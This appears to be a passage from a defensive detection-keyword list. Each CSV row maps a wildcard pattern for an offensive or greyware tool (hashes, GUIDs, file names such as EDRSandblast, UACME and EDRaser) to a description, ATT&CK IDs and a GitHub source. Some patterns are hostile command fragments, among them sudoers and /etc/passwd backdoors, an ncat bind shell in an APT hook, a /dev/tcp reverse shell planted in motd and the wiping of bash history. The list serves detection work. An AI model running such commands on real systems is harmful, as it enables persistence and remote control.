+"*e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e6b96e43c3a1a8de682f16086ea8639cfe4649092fc2f47e26fb5baa42a70caf*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e7cb9e5eaca549d918f5f048f55cf67c46e745aeccebc578eb848e46c1915719*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*E82BCAD1-0D2B-4E95-B382-933CF78A8128*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*E991E6A7-31EA-42E3-A471-90F0090E3AFD*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ea23a31a0ec1fa3ae2ff1a0bad75421cbd8d74bcfbb7abd2749eb625c918b518*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*eaphammer -i eth0 --channel 4 --auth wpa-eap --essid * --creds*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*eaphammer*","offensive_tool_keyword","EAPHammer","EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such. focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is. our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands","T1553 - T1560 - T1569 - T1590 - T1591","TA0002 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/s0lst1c3/eaphammer","1","0","N/A","N/A","10","1826","296","2023-09-17T10:13:21Z","2017-02-04T01:03:39Z" +"*eapmd5tojohn*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*easinvoker.exe*System32*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*EasyHook-Managed*InjectionLoader.cs*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*EasyHook-Managed*WOW64Bypass.*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*EasyHook-Managed/LocalHook.cs*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*EasyPersistent.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*Ebowla-master.zip*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" +"*EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*echo * .bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*echo * /home/*/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*echo * /root/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*echo * > \\.\pipe\*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*echo * ALL=(ALL) NOPASSWD: ALL* >>/etc/sudoers*","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*echo * ALL=NOPASSWD: /bin/bash* >>/etc/sudoers*","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*echo *%sudo ALL=(ALL) NOPASSWD: ALL* >> /etc/sudoers*","greyware_tool_keyword","sudo","Sudo Persistence via sudoers file","T1078 - T1166","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*echo */24 | dnsx -silent -resp-only -ptr*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*echo *::0:0::/root:/bin/bash* >>/etc/passwd*","greyware_tool_keyword","bash","add a passwordless user ","T1136.001 - T1059.004 - T1078.004","TA0005 - TA0002 - TA0004","N/A","N/A","Persistence","N/A","1","0","N/A","8","8","N/A","N/A","N/A","N/A" +"*echo *APT::Update::Pre-Invoke *nohup ncat -lvp * -e /bin/bash * > /etc/apt/apt.conf.d/*","greyware_tool_keyword","bash","Backdooring APT","T1059.004 - T1574.001 - T1027","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*echo *bailing. try a different name\*","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","N/A","https://linux.die.net/man/8/tmpwatch","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*echo *bash -c *bash -i >& /dev/tcp/*/* >> /etc/update-motd.d/00-header*","greyware_tool_keyword","bash","Backdooring Message of the Day","T1059.004 - T1574.001 - T1027","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*echo [.ShellClassInfo] > desktop.ini*","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1555.003 - T1081.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*echo 123 > c:\windows\temp\test.txt*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*echo '8.8.8.8' | hakrevdns*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*echo IconResource=\\*\* >> desktop.ini*","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1555.003 - T1081.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*echo -n 'cmd /c start rundll32 *.dll* | base64*","offensive_tool_keyword","AD exploitation cheat sheet","Generate EncodedCommand","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*echo nc -l -p * > *.bat*","greyware_tool_keyword","nc","Netcat Realy on windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*echo 'PEzor!!*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*echoac-poc-main*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" +"*echowrecker*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*ecryptfs2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ecs_task_def_data/all_task_def.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*Ed1s0nZ/cool/*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" +"*edge_wscript_wsh_injection*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*edge1.parrot.run*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*EditC2Dialog.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*edknjdjielmpdlnllkdmaghlbpnmjmgb*","greyware_tool_keyword","Muscle VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*edraser.py -*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*EDRaser-main*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*EDRSandblast.c*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EDRSandblast.exe*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EDRSandblast.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandBlast.h*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*edrsandblast.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*EDRSandblast.sln*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EDRSandblast.sln*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast.vcxproj*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_API.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_API.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_API.h*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_CLI*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EDRSandblast_LsassDump*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EDRSandblast_LsassDump.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_LsassDump.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_StaticLibrary*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EDRSandblast-GodFault*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast-master*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense 